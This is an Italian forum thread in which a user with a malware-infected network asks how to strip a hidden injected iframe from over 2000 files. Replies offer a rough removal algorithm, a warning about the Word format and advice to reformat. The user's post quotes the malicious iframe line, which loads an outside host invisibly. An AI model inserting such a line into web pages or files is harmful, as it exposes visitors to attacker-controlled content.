La mia rete è piena di virus

ROKY1

Utente Attivo
207
1
Ciao a tutti,

tutta la mia rete è piena di virus Win32, Conficker. Li stò debellando ma mi servirebbe un programmino che vada a cancellare la seguente stringa, creata dal virus in tantissimi file (oltre 2000):

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframes

La stringa l'ha creata in più di 2000 file, farli uno ad uno sarebbe veramente impossibile tanto più che il problema ce l'ho su vari PC.

Ho provato con word con il comando "sostituisci" impostando la stringa sopra indicata da ricercare e che venisse sostituita con "nulla". L'operazione la fa regolarmente ma il problema è che, anche in questo caso, devo fare un file alla volta. Non mi passa più.
Qualcuno mi ha detto che andrebbe fatto uno script, non so come vada fatto.
La cosa migliare sarebbe un bel programmino già pronto.
Attendo i vostri preziosi consigli.
Ciao.

Mi sono spiegato?
Ho 2000 file da ripulire da questo virus e pertanto se devo farli uno per uno impazzisco.
Ho provato con word con il comando "sostituisci" impostando la stringa sopra indicata da ricercare e che venisse sostituita con "nulla". L'operazione la fa regolarmente ma il problema che anche in questo caso devo fare un file alla volta, non mi passa più.
Qualcuno mi ha detto che andrebbe fatto uno script, non so come vada fatto.
La cosa migliare sarebbe però un bel programmino già pronto.
Ne conoscete qualcuno?
Attendo i vostri preziosi consigli.
 

dr.pexquz

Utente Attivo
346
9
CPU
Intel Core 2 Duo E5200 2.5Ghz 2Mb BOX
Scheda Madre
ASROCK 775 4Core1600Twins-P35
Hard Disk
SSD Samsung MZ-7TD250BW 250GB + Hard Disk WD Green WD30EZRX 3TB
RAM
DDR2 800Mhz PC6400 4GB Kingston HyperX (2x2GB)
Scheda Video
AMD XFX Radeon HD6870
Scheda Audio
Integrata
Monitor
LG Flatron E2240T
Sistema Operativo
Windows 8 Pro + Media Center Pack
guarda purtroppo non ho tempo di farti il programma ma di seguito ti scrivo l'algoritmo per farlo:

dovresti usare un linguaggio con una libreria che data una cartella ti restituisca un array di stringhe coi nomi dei file, una volta fatto questo usi una fopen sul nome dei vari file, controlli carattere per carattere usando if annidati su quella stringa (se il carattere tot corrisponde al primo carattere della stringa da cancellare memorizzi l'offset del carattere (1), controlli che quello dopo e quello dopo ancora siano uguali a quelli della stringa da cancellare fino all'ultimo, se tutti i caratteri corrispondono memorizzi l'offset dell'ultimo carattere del file (2) e per offset2-offset1 volte scrivi il carattere backspace preso dalla mappa dei caratteri ascii a partire da offset2). questo per tutti i file dell'array che hai ottenuto all'inizio.
 

ROKY1

Utente Attivo
207
1
Ciao dr.pexquz,
grazie per aver risposto.
Purtroppo non ho capito ben poco di quello che mi hai detto, non ho mai fatto programmazione e pertanto ti chiederei di semplificare un pò il tutto se puoi.
 

appena_iscritto

Utente Attivo
505
2
CPU
t7600
Hard Disk
200GB
RAM
2GB
Scheda Video
Nvidia
Sistema Operativo
Vista Hp
Attenzione al fatto che il formato word .doc non è come un comune file di testo (.txt).
 

darkino

Utente Attivo
56
0
CPU
Quad q6600
Scheda Madre
Asus p5k premium
Hard Disk
320 gb maxtor
RAM
Team group 2 gb 400 mhz
Scheda Video
Nvidia 8800 GT
Scheda Audio
Integrata
Monitor
Philips 170S
Alimentatore
GameXtreme 700 watt OCZ
Case
Aerocool
Sistema Operativo
Windows XP
nn fai prima a formattare?? potresti avere altre stringe nascoste
 

scarface85

Utente Attivo
1,015
43
CPU
Amd Vishera 8350 oc 4.4
Dissipatore
corsair A70
Scheda Madre
Asrock 970 extreme 4
Hard Disk
SSd 120gb - maxtor 1t
RAM
Geil ddr3 8Gb 1600 Mhz
Scheda Video
asus gtx 1050ti 4gb
Scheda Audio
asus xonar dgx
Monitor
samsung 24 - 1920x1080
Alimentatore
corsair hx 850w modulare
Case
banchetto fai da te (moddato) + scythe kaze master ace
Sistema Operativo
windows 10 pro 64 bit
fai una bella formattazione completa e risolvi il problema!!! se devi salvare qualchè file mettilo su cd!!!
 

Entra

oppure Accedi utilizzando

Discussioni Simili

Hot del momento